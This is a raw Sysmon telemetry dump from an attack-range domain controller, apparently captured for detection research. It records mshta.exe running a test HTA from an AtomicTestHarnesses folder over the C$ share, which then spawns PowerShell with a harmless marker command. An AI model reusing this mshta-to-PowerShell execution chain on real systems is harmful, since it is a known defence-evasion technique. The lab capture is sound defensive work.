10341000x800000000000000024796Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.460{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024795Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.460{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024794Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.460{7901BC46-4A88-6008-F200-00000000A301}19126716C:\Windows\system32\csrss.exe{7901BC46-535E-6008-5106-00000000A301}6508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000024793Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.460{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024792Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.460{7901BC46-535E-6008-5006-00000000A301}1804868C:\Windows\System32\mshta.exe{7901BC46-535E-6008-5106-00000000A301}6508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\shell32.dll+8d42f|C:\Windows\System32\shell32.dll+8d2bc|C:\Windows\System32\shell32.dll+6b47e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000024791Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.470{7901BC46-535E-6008-5106-00000000A301}6508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa; Start-Sleep -Seconds 2; exitC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{7901BC46-535E-6008-5006-00000000A301}1804C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "\\WIN-DC-283\C$\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\test.hta" 10341000x800000000000000024790Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.429{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-535E-6008-5006-00000000A301}1804C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024789Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.429{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-535E-6008-5006-00000000A301}1804C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024788Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.429{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-535E-6008-5006-00000000A301}1804C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024787Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.429{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-535E-6008-5006-00000000A301}1804C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024786Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.429{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-535E-6008-5006-00000000A301}1804C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024785Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.413{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-535E-6008-5006-00000000A301}1804C:\Windows\System32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024784Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.413{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-535E-6008-5006-00000000A301}1804C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024783Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.397{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-535E-6008-5006-00000000A301}1804C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000024782Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.397{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024781Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.397{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024780Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.397{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024779Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.397{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024778Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.397{7901BC46-4984-6008-0500-00000000A301}640656C:\Windows\system32\csrss.exe{7901BC46-535E-6008-5006-00000000A301}1804C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000024777Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.397{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535E-6008-5006-00000000A301}1804C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4 154100x800000000000000024776Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.403{7901BC46-535E-6008-5006-00000000A301}1804C:\Windows\System32\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXE"C:\Windows\System32\mshta.exe" "\\WIN-DC-283\C$\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\test.hta"C:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC,IMPHASH=BECF3D88380DC97C52B1C2E7B1BCCF4B{7901BC46-5350-6008-1E06-00000000A301}6628C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x800000000000000024775Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.382{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535D-6008-4F06-00000000A301}7788C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024774Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.382{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535D-6008-4E06-00000000A301}3308C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024773Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.382{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535D-6008-4D06-00000000A301}7188C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024772Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.382{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024771Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.382{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024770Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.382{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 